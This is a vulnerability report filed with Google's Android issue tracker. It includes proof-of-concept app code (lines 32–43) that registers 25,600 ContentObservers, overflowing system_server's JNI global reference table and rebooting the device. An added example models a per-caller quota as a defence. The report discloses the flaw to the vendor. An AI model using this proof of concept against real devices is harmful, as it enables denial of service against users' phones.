Bug Report to Google of Android
https://issuetracker.google.com/issues/117744552
When malicious code in an app registers too many ContentObservers, system_server creates many Binder proxy objects and JNI global reference objects, which leads to a JNI global reference table overflow that makes the system reboot.
As in the code below, when the onClick method at line 32 is called, the system reboots with a JNI error.
The log and demo code are attached.
1 public class MainActivity extends ActionBarActivity
2         implements OnClickListener {
3
4     class SettingsObserver extends ContentObserver {
5         SettingsObserver(Handler handler) {
6             super(handler);
7         }
8
9         void observe() {
10             ContentResolver resolver = getContentResolver();
11             resolver.registerContentObserver(
12                     Settings.System.getUriFor(Settings.System.ALARM_ALERT), false, this);
13
14             updateSettings();
15         }
16         @Override
17         public void onChange(boolean selfChange) {
18             updateSettings();
19         }
20
21         @Override
22         protected void finalize() throws Throwable {
23             getContentResolver().unregisterContentObserver(this);
24             // TODO Auto-generated method stub
25             super.finalize();
26         }
27     }
28
29     public void updateSettings() {
30     }
31
32     public void onClick(View src)
33     {
34         try {
35             new Thread() {
36                 @Override
37                 public void run() {
38                     for (int i = 0; i < 25600; i++) {
39                         SettingsObserver observer = new SettingsObserver(null);
40                         observer.observe();
41                     }
42                 }
43             }.start();
44
45         } catch (Exception e) {
46             // TODO: handle exception
47         }
48
49
50     }
51 }
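
One way a service can bound the resource this report exhausts, shown as an added example that is not part of the original report and is not AOSP code: a per-caller quota on registered observers, so a single UID cannot make the service pin an unbounded number of references. The class name, the limit of 1000 and the UIDs are assumptions made for the demo.

```java
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

// Hypothetical model of a service-side observer registry; not AOSP code.
public class ObserverQuotaDemo {
    static final int MAX_OBSERVERS_PER_UID = 1000; // assumed limit for the demo

    // uid -> observer tokens currently held on behalf of that caller
    private final Map<Integer, Set<Object>> byUid = new HashMap<>();

    // Each accepted token stands for one remote reference the service must pin.
    synchronized boolean register(int uid, Object token) {
        Set<Object> held = byUid.computeIfAbsent(uid, k -> new HashSet<>());
        if (held.contains(token)) return true;                  // idempotent re-register
        if (held.size() >= MAX_OBSERVERS_PER_UID) return false; // refuse, pin nothing
        return held.add(token);
    }

    synchronized void unregister(int uid, Object token) {
        Set<Object> held = byUid.get(uid);
        if (held != null && held.remove(token) && held.isEmpty()) byUid.remove(uid);
    }

    // Called when the caller's process dies, so everything it held is released.
    synchronized void onCallerDied(int uid) { byUid.remove(uid); }

    synchronized int held(int uid) {
        Set<Object> s = byUid.get(uid);
        return s == null ? 0 : s.size();
    }

    public static void main(String[] args) {
        ObserverQuotaDemo registry = new ObserverQuotaDemo();
        int noisyUid = 10123, otherUid = 10200; // constructed sample UIDs
        int refused = 0;
        for (int i = 0; i < 25600; i++) {        // same loop count as the report
            if (!registry.register(noisyUid, new Object())) refused++;
        }
        System.out.println("held=" + registry.held(noisyUid) + " refused=" + refused);
        System.out.println("other caller ok=" + registry.register(otherUid, new Object()));
        registry.onCallerDied(noisyUid);
        System.out.println("after death held=" + registry.held(noisyUid));
    }
}
```

The quota is keyed by caller, so a caller that hits its limit is refused while other callers keep registering normally.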